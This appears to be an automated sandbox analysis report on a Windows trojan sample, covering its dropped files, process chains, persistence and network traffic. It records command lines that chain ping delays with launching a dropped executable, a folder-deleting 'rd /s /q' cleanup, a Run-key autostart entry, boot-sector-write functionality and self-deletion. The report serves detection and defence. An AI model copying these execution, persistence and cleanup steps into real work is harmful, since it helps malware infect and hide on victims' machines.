Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:58376 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:62469 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:49958 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:52868 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:59714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:63675 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:50825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:54534 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:58497 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:62214 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:64509 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:51516 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:55401 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:58770 version: TLS 1.2

System Summary

barindex
PE file has a writeable .text section
Source: rjqzr.dll.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000C160: wsprintfA,DeviceIoControl,6_2_1000C160
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100049F0 ExitWindowsEx,6_2_100049F0
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_00414D000_2_00414D00
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeCode function: 5_2_00414D005_2_00414D00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10005A106_2_10005A10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000EB806_2_1000EB80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000DB906_2_1000DB90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100104006_2_10010400
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000F5006_2_1000F500
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100096906_2_10009690
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000EF706_2_1000EF70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 293 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10011A66 appears 47 times
Source: XgijTrY6No.exeBinary or memory string: OriginalFilename vs XgijTrY6No.exe
Source: XgijTrY6No.exe, 00000000.00000000.1340687159.0000000000414000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDSignTool4 vs XgijTrY6No.exe
Source: XgijTrY6No.exe, 00000000.00000003.1343399810.0000000002128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDSignTool4 vs XgijTrY6No.exe
Source: XgijTrY6No.exeBinary or memory string: OriginalFilenameDSignTool4 vs XgijTrY6No.exe
Source: XgijTrY6No.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: rjqzr.dll.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rjqzr.dll.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/3@51/3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000C230 sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA,6_2_1000C230
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10004F60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,6_2_10004F60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100060E0 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,6_2_100060E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10004B90 AdjustTokenPrivileges,6_2_10004B90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10004AA0 CreateToolhelp32Snapshot,6_2_10004AA0
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_00401A2A FindResourceA,LoadResource,0_2_00401A2A
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\krnaver.com:6520
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Mkrnaver.com:6520
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03
Source: C:\Users\user\Desktop\XgijTrY6No.exeFile created: C:\Users\user\AppData\Local\Temp\mszcy.exeJump to behavior
Source: C:\Users\user\Desktop\XgijTrY6No.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeProcess created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface C:\Users\user\AppData\Local\Temp\mszcy.exe
Source: XgijTrY6No.exeReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\XgijTrY6No.exeFile read: C:\Users\user\Desktop\XgijTrY6No.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\XgijTrY6No.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
Source: C:\Users\user\Desktop\XgijTrY6No.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\mszcy.exe C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeProcess created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface C:\Users\user\AppData\Local\Temp\mszcy.exe
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\XgijTrY6No.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\mszcy.exe C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeProcess created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface C:\Users\user\AppData\Local\Temp\mszcy.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\XgijTrY6No.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\XgijTrY6No.exeSection loaded: mfc42.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeSection loaded: mfc42.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*.** source: rundll32.exe, 00000006.00000003.3597257344.0000000000D03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rod.pdb\*.** source: rundll32.exe, 00000006.00000003.1813794875.0000000000D3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1813762319.0000000000D34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.** source: rundll32.exe, 00000006.00000003.2262348463.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.**e source: rundll32.exe, 00000006.00000003.1572496969.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1572330291.0000000000D46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: rundll32.exe, 00000006.00000003.2262330522.0000000000D42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000006.00000003.3597257344.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.**.*** source: rundll32.exe, 00000006.00000003.3031707203.0000000005B50000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary,6_2_100051B0
Source: initial sampleStatic PE information: section where entry point is pointing to: GDR
Source: rjqzr.dll.5.drStatic PE information: real checksum: 0x10fa9 should be: 0xeaf9
Source: XgijTrY6No.exeStatic PE information: real checksum: 0x0 should be: 0x25335
Source: mszcy.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1595f
Source: XgijTrY6No.exeStatic PE information: section name: .CG
Source: XgijTrY6No.exeStatic PE information: section name: .adata
Source: mszcy.exe.0.drStatic PE information: section name: .CG
Source: mszcy.exe.0.drStatic PE information: section name: .adata
Source: rjqzr.dll.5.drStatic PE information: section name: GDR
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_0041400A push ebp; ret 0_2_0041400D
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_00414014 push 00000000h; ret 0_2_00414425
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_00402EE0 push eax; ret 0_2_00402F0E
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeCode function: 5_2_0041400A push ebp; ret 5_2_0041400D
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeCode function: 5_2_00414014 push 00000000h; ret 5_2_00414425
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeCode function: 5_2_00402EE0 push eax; ret 5_2_00402F0E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10010F90 push eax; ret 6_2_10010FBE
Source: rjqzr.dll.5.drStatic PE information: section name: .text entropy: 7.9944271829324975
Source: rjqzr.dll.5.drStatic PE information: section name: .rsrc entropy: 7.3301358156247804

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exeCode function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d6_2_1000C230
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeFile created: C:\ftelcs\rjqzr.dllJump to dropped file
Source: C:\Users\user\Desktop\XgijTrY6No.exeFile created: C:\Users\user\AppData\Local\Temp\mszcy.exeJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeFile created: c:\ftelcs\ReadMe.txtJump to behavior

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exeCode function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d6_2_1000C230
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgrJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Deletes itself after installation
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeFile deleted: c:\users\user\desktop\xgijtry6no.exeJump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50319 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50354 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50356 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50416 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50450 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50483 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50517 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50521 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50610 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50614 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50675 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50681 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50730 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50804 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50810 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50858 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50959 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50969 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51054 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51059 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51165 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51270 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51281 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51398 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51413 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51526 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51647 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51656 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51746 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51754 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51887 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51895 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53096 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53196 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55196 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55373 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56825 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56943 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58262 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58391 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59886 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60187 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62140 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62324 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63850 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63953 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49408 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50887 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50978 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52262 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52324 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53384 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53421 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55505 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55526 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56247 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56326 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57951 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58061 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58996 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59064 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60767 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60826 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62599 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62749 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64837 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64938 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52148 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54341 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56340 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56384 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58345 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58350 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59128 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59213 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60550 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60645 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61837 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61878 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63820 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63928 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51179 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51231 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52745 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52943 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55099 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55105 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56148 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56266 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57522 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57654 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59061 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59074 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60826 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60939 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62420 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62477 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64620 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64839 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51593 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52000 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52120 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54323 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54419 -> 12354
